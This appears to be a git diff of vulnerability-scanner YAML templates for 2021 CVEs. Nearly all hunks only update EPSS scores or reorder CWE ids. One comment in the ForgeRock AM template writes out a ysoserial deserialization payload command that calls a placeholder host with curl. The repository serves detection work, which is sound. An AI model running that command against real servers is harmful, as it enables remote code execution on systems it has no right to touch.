cpe:2.3:a:forgerock:am:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -56,4 +56,4 @@ http: - 200 # {{BaseURL}}/openam/oauth2/..;/ccversion/Version?jato.pageSession= -# java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 "curl http://YOUR_HOST" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' \ No newline at end of file +# java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 "curl http://YOUR_HOST" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index aeaf059913..35e9f1584c 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-35488 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.49646 + epss-percentile: 0.50014 cpe: cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml index 4d87bbf8cc..b607d67ee3 100644 --- a/http/cves/2021/CVE-2021-35587.yaml +++ b/http/cves/2021/CVE-2021-35587.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-35587 cwe-id: CWE-502 - epss-score: 0.96868 - epss-percentile: 0.99568 + epss-score: 0.95945 + epss-percentile: 0.99267 cpe: cpe:2.3:a:oracle:access_manager:11.1.2.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-3577.yaml b/http/cves/2021/CVE-2021-3577.yaml index b84aad6b6b..1abfe1bb9e 100644 --- a/http/cves/2021/CVE-2021-3577.yaml +++ b/http/cves/2021/CVE-2021-3577.yaml @@ -15,9 +15,9 @@ info: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-3577 - cwe-id: CWE-863,CWE-78 - epss-score: 0.97158 - epss-percentile: 0.99701 + cwe-id: CWE-78,CWE-863 + epss-score: 0.97098 + epss-percentile: 0.99695 cpe: cpe:2.3:o:binatoneglobal:halo\+_camera_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-36260.yaml b/http/cves/2021/CVE-2021-36260.yaml index b73548088c..188d7951ef 100644 --- a/http/cves/2021/CVE-2021-36260.yaml +++ b/http/cves/2021/CVE-2021-36260.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-36260 cwe-id: CWE-78 - epss-score: 0.97514 - epss-percentile: 0.99972 + epss-score: 0.97507 + epss-percentile: 0.99977 cpe: cpe:2.3:o:hikvision:ds-2cd2026g2-iu\/sl_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-36356.yaml b/http/cves/2021/CVE-2021-36356.yaml index 5bbe3c9c93..7433eb8c3d 100644 --- a/http/cves/2021/CVE-2021-36356.yaml +++ b/http/cves/2021/CVE-2021-36356.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-36356 cwe-id: CWE-434 - epss-score: 0.92269 - epss-percentile: 0.98579 + epss-score: 0.84045 + epss-percentile: 0.98092 cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-36380.yaml b/http/cves/2021/CVE-2021-36380.yaml index 354a18df6c..810b24f1bc 100644 --- a/http/cves/2021/CVE-2021-36380.yaml +++ b/http/cves/2021/CVE-2021-36380.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-36380 cwe-id: CWE-78 - epss-score: 0.96993 - epss-percentile: 0.9962 + epss-score: 0.96981 + epss-percentile: 0.99639 cpe: cpe:2.3:a:sunhillo:sureline:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml index eaf8cd4164..dcc1e6285d 100644 --- a/http/cves/2021/CVE-2021-36450.yaml +++ b/http/cves/2021/CVE-2021-36450.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-36450 cwe-id: CWE-79 - epss-score: 0.00468 - epss-percentile: 0.72463 + epss-score: 0.00377 + epss-percentile: 0.69679 cpe: cpe:2.3:a:verint:workforce_optimization:15.2.8.10048:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-3654.yaml b/http/cves/2021/CVE-2021-3654.yaml index 87d84d78ad..c2dcc28d60 100644 --- a/http/cves/2021/CVE-2021-3654.yaml +++ b/http/cves/2021/CVE-2021-3654.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-3654 cwe-id: CWE-601 - epss-score: 0.93152 - epss-percentile: 0.98686 + epss-score: 0.92596 + epss-percentile: 0.98684 cpe: cpe:2.3:a:openstack:nova:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index ba8f7f725e..7da6f5f2f8 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-36580 cwe-id: CWE-601 epss-score: 0.00212 - epss-percentile: 0.58419 + epss-percentile: 0.5882 cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-36748.yaml b/http/cves/2021/CVE-2021-36748.yaml index dffb3a8186..60af295a76 100644 --- a/http/cves/2021/CVE-2021-36748.yaml +++ b/http/cves/2021/CVE-2021-36748.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-36748 cwe-id: CWE-89 - epss-score: 0.00805 - epss-percentile: 0.79534 + epss-score: 0.0061 + epss-percentile: 0.76202 cpe: cpe:2.3:a:prestahome:blog:*:*:*:*:*:prestashop:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-36749.yaml b/http/cves/2021/CVE-2021-36749.yaml index bc0b41941c..b36209bb1d 100644 --- a/http/cves/2021/CVE-2021-36749.yaml +++ b/http/cves/2021/CVE-2021-36749.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-36749 cwe-id: CWE-863 - epss-score: 0.94684 - epss-percentile: 0.98933 + epss-score: 0.93858 + epss-percentile: 0.98852 cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-36873.yaml b/http/cves/2021/CVE-2021-36873.yaml index 1c0688e52a..db4e08d79b 100644 --- a/http/cves/2021/CVE-2021-36873.yaml +++ b/http/cves/2021/CVE-2021-36873.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-36873 cwe-id: CWE-79 epss-score: 0.00131 - epss-percentile: 0.47313 + epss-percentile: 0.47637 cpe: cpe:2.3:a:webence:iq_block_country:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-37216.yaml b/http/cves/2021/CVE-2021-37216.yaml index fbbc7a3e47..234bdbbdc1 100644 --- a/http/cves/2021/CVE-2021-37216.yaml +++ b/http/cves/2021/CVE-2021-37216.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-37216 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42468 + epss-percentile: 0.42814 cpe: cpe:2.3:o:qsan:xn8024r_firmware:3.1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml index 575a89fa1d..458aa638b0 100644 --- a/http/cves/2021/CVE-2021-37304.yaml +++ b/http/cves/2021/CVE-2021-37304.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-37304 cwe-id: CWE-732 - epss-score: 0.0101 - epss-percentile: 0.81823 + epss-score: 0.01116 + epss-percentile: 0.82941 cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index c70026920c..9c86c29f44 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-37305 cwe-id: CWE-732 - epss-score: 0.00246 - epss-percentile: 0.618 + epss-score: 0.00272 + epss-percentile: 0.6424 cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml index 2a17b674bb..9dcda6b100 100644 --- a/http/cves/2021/CVE-2021-37416.yaml +++ b/http/cves/2021/CVE-2021-37416.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-37416 cwe-id: CWE-79 epss-score: 0.00118 - epss-percentile: 0.45063 + epss-percentile: 0.45448 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-37538.yaml b/http/cves/2021/CVE-2021-37538.yaml index d12f633a94..d5c185fd6f 100644 --- a/http/cves/2021/CVE-2021-37538.yaml +++ b/http/cves/2021/CVE-2021-37538.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-37538 cwe-id: CWE-89 - epss-score: 0.02621 - epss-percentile: 0.88974 + epss-score: 0.01408 + epss-percentile: 0.84963 cpe: cpe:2.3:a:smartdatasoft:smartblog:*:*:*:*:*:prestashop:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37573.yaml b/http/cves/2021/CVE-2021-37573.yaml index 3c22f59263..c758eba982 100644 --- a/http/cves/2021/CVE-2021-37573.yaml +++ b/http/cves/2021/CVE-2021-37573.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-37573 cwe-id: CWE-79 epss-score: 0.00303 - epss-percentile: 0.65782 + epss-percentile: 0.66124 cpe: cpe:2.3:a:tiny_java_web_server_project:tiny_java_web_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37580.yaml b/http/cves/2021/CVE-2021-37580.yaml index 50aa7eadd9..9249db7968 100644 --- a/http/cves/2021/CVE-2021-37580.yaml +++ b/http/cves/2021/CVE-2021-37580.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-37580 cwe-id: CWE-287 - epss-score: 0.93293 - epss-percentile: 0.98709 + epss-score: 0.92347 + epss-percentile: 0.98652 cpe: cpe:2.3:a:apache:shenyu:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-37589.yaml b/http/cves/2021/CVE-2021-37589.yaml index a18f93051c..7b8bfbce11 100644 --- a/http/cves/2021/CVE-2021-37589.yaml +++ b/http/cves/2021/CVE-2021-37589.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-37589 cwe-id: CWE-89 epss-score: 0.0051 - epss-percentile: 0.73614 + epss-percentile: 0.73892 cpe: cpe:2.3:a:virtuasoftware:cobranca:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-37704.yaml b/http/cves/2021/CVE-2021-37704.yaml index 329912cb97..d452221294 100644 --- a/http/cves/2021/CVE-2021-37704.yaml +++ b/http/cves/2021/CVE-2021-37704.yaml @@ -17,9 +17,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2021-37704 - cwe-id: CWE-200,CWE-668 + cwe-id: CWE-668,CWE-200 epss-score: 0.00282 - epss-percentile: 0.64484 + epss-percentile: 0.64884 cpe: cpe:2.3:a:phpfastcache:phpfastcache:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index f06d1a975f..bbc552c34b 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-37833 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.37259 + epss-percentile: 0.3763 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.2:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2021/CVE-2021-38314.yaml b/http/cves/2021/CVE-2021-38314.yaml index e23fa87b43..341ff7bba6 100644 --- a/http/cves/2021/CVE-2021-38314.yaml +++ b/http/cves/2021/CVE-2021-38314.yaml @@ -16,9 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-38314 - cwe-id: CWE-916,CWE-200 + cwe-id: CWE-200,CWE-916 epss-score: 0.00153 - epss-percentile: 0.50938 + epss-percentile: 0.51334 cpe: cpe:2.3:a:redux:gutenberg_template_library_\&_redux_framework:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml index 2482761119..66b23f4e4f 100644 --- a/http/cves/2021/CVE-2021-38540.yaml +++ b/http/cves/2021/CVE-2021-38540.yaml @@ -14,9 +14,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-38540 - cwe-id: CWE-269,CWE-306 - epss-score: 0.006 - epss-percentile: 0.75724 + cwe-id: CWE-306,CWE-269 + epss-score: 0.0052 + epss-percentile: 0.74123 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-38647.yaml b/http/cves/2021/CVE-2021-38647.yaml index 3bd11c8ddd..8c4f93234b 100644 --- a/http/cves/2021/CVE-2021-38647.yaml +++ b/http/cves/2021/CVE-2021-38647.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-38647 cwe-id: CWE-287 - epss-score: 0.97445 - epss-percentile: 0.99918 + epss-score: 0.9732 + epss-percentile: 0.99833 cpe: cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-38702.yaml b/http/cves/2021/CVE-2021-38702.yaml index f031b2ed1b..212ecc8e66 100644 --- a/http/cves/2021/CVE-2021-38702.yaml +++ b/http/cves/2021/CVE-2021-38702.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-38702 cwe-id: CWE-79 - epss-score: 0.0057 - epss-percentile: 0.75034 + epss-score: 0.0076 + epss-percentile: 0.79041 cpe: cpe:2.3:o:cyberoamworks:netgenie_c0101b1-20141120-ng11vo_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index 04dd3a74de..a0b3dc2bb3 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-38704 cwe-id: CWE-79 epss-score: 0.00141 - epss-percentile: 0.49142 + epss-percentile: 0.49512 cpe: cpe:2.3:a:cliniccases:cliniccases:7.3.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-38751.yaml b/http/cves/2021/CVE-2021-38751.yaml index b77fe3d593..7167026f42 100644 --- a/http/cves/2021/CVE-2021-38751.yaml +++ b/http/cves/2021/CVE-2021-38751.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-38751 cwe-id: CWE-116 epss-score: 0.00242 - epss-percentile: 0.6141 + epss-percentile: 0.61804 cpe: cpe:2.3:a:exponentcms:exponentcms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39141.yaml b/http/cves/2021/CVE-2021-39141.yaml index 7b7c694925..f1851bc44f 100644 --- a/http/cves/2021/CVE-2021-39141.yaml +++ b/http/cves/2021/CVE-2021-39141.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.5 cve-id: CVE-2021-39141 cwe-id: CWE-434 - epss-score: 0.15968 - epss-percentile: 0.95247 + epss-score: 0.1641 + epss-percentile: 0.95388 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39144.yaml b/http/cves/2021/CVE-2021-39144.yaml index 9a187a5834..0b14bbcedd 100644 --- a/http/cves/2021/CVE-2021-39144.yaml +++ b/http/cves/2021/CVE-2021-39144.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.5 cve-id: CVE-2021-39144 cwe-id: CWE-306,CWE-502 - epss-score: 0.97244 - epss-percentile: 0.99759 + epss-score: 0.96508 + epss-percentile: 0.99442 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39146.yaml b/http/cves/2021/CVE-2021-39146.yaml index 7f36db4789..7d3e486580 100644 --- a/http/cves/2021/CVE-2021-39146.yaml +++ b/http/cves/2021/CVE-2021-39146.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-39146 cwe-id: CWE-434 epss-score: 0.15366 - epss-percentile: 0.95168 + epss-percentile: 0.95258 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39152.yaml b/http/cves/2021/CVE-2021-39152.yaml index 62ebb3be5f..c5471b71e5 100644 --- a/http/cves/2021/CVE-2021-39152.yaml +++ b/http/cves/2021/CVE-2021-39152.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-39152 cwe-id: CWE-502 epss-score: 0.00668 - epss-percentile: 0.77147 + epss-percentile: 0.77414 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index 700c3b1594..248c4fec4d 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-39165 cwe-id: CWE-287 - epss-score: 0.02927 - epss-percentile: 0.89509 + epss-score: 0.03142 + epss-percentile: 0.89971 cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index 445adefd92..06157cd4be 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml @@ -15,8 +15,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-39211 cwe-id: CWE-668,CWE-200 - epss-score: 0.00208 - epss-percentile: 0.58059 + epss-score: 0.00232 + epss-percentile: 0.61023 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml index 815739640c..d10e4ed037 100644 --- a/http/cves/2021/CVE-2021-39226.yaml +++ b/http/cves/2021/CVE-2021-39226.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.3 cve-id: CVE-2021-39226 cwe-id: CWE-287 - epss-score: 0.9726 - epss-percentile: 0.99768 + epss-score: 0.92988 + epss-percentile: 0.98734 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39312.yaml b/http/cves/2021/CVE-2021-39312.yaml index 09be4eae8a..685296146f 100644 --- a/http/cves/2021/CVE-2021-39312.yaml +++ b/http/cves/2021/CVE-2021-39312.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-39312 cwe-id: CWE-22 - epss-score: 0.05291 - epss-percentile: 0.92075 + epss-score: 0.06634 + epss-percentile: 0.92989 cpe: cpe:2.3:a:trueranker:true_ranker:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39316.yaml b/http/cves/2021/CVE-2021-39316.yaml index 0be15b661e..6cbe6cba73 100644 --- a/http/cves/2021/CVE-2021-39316.yaml +++ b/http/cves/2021/CVE-2021-39316.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-39316 cwe-id: CWE-22 epss-score: 0.42316 - epss-percentile: 0.96839 + epss-percentile: 0.96891 cpe: cpe:2.3:a:digitalzoomstudio:zoomsounds:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml index be9d53ee75..b9845e5d45 100644 --- a/http/cves/2021/CVE-2021-39320.yaml +++ b/http/cves/2021/CVE-2021-39320.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-39320 cwe-id: CWE-79 epss-score: 0.0021 - epss-percentile: 0.5823 + epss-percentile: 0.58639 cpe: cpe:2.3:a:underconstruction_project:underconstruction:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-39322.yaml b/http/cves/2021/CVE-2021-39322.yaml index 08cf4662d7..51e9c864ab 100644 --- a/http/cves/2021/CVE-2021-39322.yaml +++ b/http/cves/2021/CVE-2021-39322.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-39322 cwe-id: CWE-79 epss-score: 0.00234 - epss-percentile: 0.60774 + epss-percentile: 0.61151 cpe: cpe:2.3:a:cybernetikz:easy_social_icons:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-39327.yaml b/http/cves/2021/CVE-2021-39327.yaml index 4fdbb40d7d..6f69b8a74a 100644 --- a/http/cves/2021/CVE-2021-39327.yaml +++ b/http/cves/2021/CVE-2021-39327.yaml @@ -17,9 +17,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-39327 - cwe-id: CWE-459,CWE-200 - epss-score: 0.08547 - epss-percentile: 0.93622 + cwe-id: CWE-200,CWE-459 + epss-score: 0.1118 + epss-percentile: 0.94527 cpe: cpe:2.3:a:ait-pro:bulletproof_security:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-39350.yaml b/http/cves/2021/CVE-2021-39350.yaml index 99b8732598..9bdadac518 100644 --- a/http/cves/2021/CVE-2021-39350.yaml +++ b/http/cves/2021/CVE-2021-39350.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-39350 cwe-id: CWE-79 epss-score: 0.00104 - epss-percentile: 0.41813 + epss-percentile: 0.42134 cpe: cpe:2.3:a:foliovision:fv_flowplayer_video_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml index ec783ac4b6..73740be115 100644 --- a/http/cves/2021/CVE-2021-39433.yaml +++ b/http/cves/2021/CVE-2021-39433.yaml @@ -15,8 +15,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-39433 - epss-score: 0.00902 - epss-percentile: 0.80714 + epss-score: 0.00637 + epss-percentile: 0.76747 cpe: cpe:2.3:a:biqs:biqsdrive:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml index 1dd9ada392..6def43ab63 100644 --- a/http/cves/2021/CVE-2021-39501.yaml +++ b/http/cves/2021/CVE-2021-39501.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-39501 cwe-id: CWE-601 epss-score: 0.00093 - epss-percentile: 0.38821 + epss-percentile: 0.39177 cpe: cpe:2.3:a:eyoucms:eyoucms:1.5.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml index f13c725cf6..81be27878a 100644 --- a/http/cves/2021/CVE-2021-40149.yaml +++ b/http/cves/2021/CVE-2021-40149.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-40149 cwe-id: CWE-552 epss-score: 0.00689 - epss-percentile: 0.77586 + epss-percentile: 0.7783 cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index 2d0ab21104..80796176cb 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-40150 cwe-id: CWE-552 - epss-score: 0.00892 - epss-percentile: 0.80593 + epss-score: 0.01002 + epss-percentile: 0.81945 cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-40323.yaml b/http/cves/2021/CVE-2021-40323.yaml index 44b20975e1..9aa618818e 100644 --- a/http/cves/2021/CVE-2021-40323.yaml +++ b/http/cves/2021/CVE-2021-40323.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40323 cwe-id: CWE-94 - epss-score: 0.01788 - epss-percentile: 0.86537 + epss-score: 0.0192 + epss-percentile: 0.87252 cpe: cpe:2.3:a:cobbler_project:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml index 21a4437fce..3832e9bbe8 100644 --- a/http/cves/2021/CVE-2021-40438.yaml +++ b/http/cves/2021/CVE-2021-40438.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9 cve-id: CVE-2021-40438 cwe-id: CWE-918 - epss-score: 0.97523 - epss-percentile: 0.99978 + epss-score: 0.97309 + epss-percentile: 0.99825 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 6fbe1c1a46..885ace2eab 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40539 cwe-id: CWE-706 - epss-score: 0.97487 - epss-percentile: 0.99953 + epss-score: 0.9741 + epss-percentile: 0.999 cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4510:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index 93f761111e..e73ebe2318 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-40542 cwe-id: CWE-79 epss-score: 0.00643 - epss-percentile: 0.76616 + epss-percentile: 0.7689 cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40661.yaml b/http/cves/2021/CVE-2021-40661.yaml index c68c71da11..f9ceac7abb 100644 --- a/http/cves/2021/CVE-2021-40661.yaml +++ b/http/cves/2021/CVE-2021-40661.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-40661 cwe-id: CWE-22 - epss-score: 0.01112 - epss-percentile: 0.82732 + epss-score: 0.0123 + epss-percentile: 0.8383 cpe: cpe:2.3:o:mt:ind780_firmware:7.2.10:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index fb20d7197e..78e82b2e9a 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-40822 cwe-id: CWE-918 - epss-score: 0.6683 - epss-percentile: 0.97493 + epss-score: 0.71633 + epss-percentile: 0.97691 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-40856.yaml b/http/cves/2021/CVE-2021-40856.yaml index e2d78fb159..d7a6a0fb29 100644 --- a/http/cves/2021/CVE-2021-40856.yaml +++ b/http/cves/2021/CVE-2021-40856.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-40856 cwe-id: CWE-706 epss-score: 0.02537 - epss-percentile: 0.88804 + epss-percentile: 0.88954 cpe: cpe:2.3:o:auerswald:comfortel_3600_ip_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40859.yaml b/http/cves/2021/CVE-2021-40859.yaml index d93ce1b38c..81101ebc2e 100644 --- 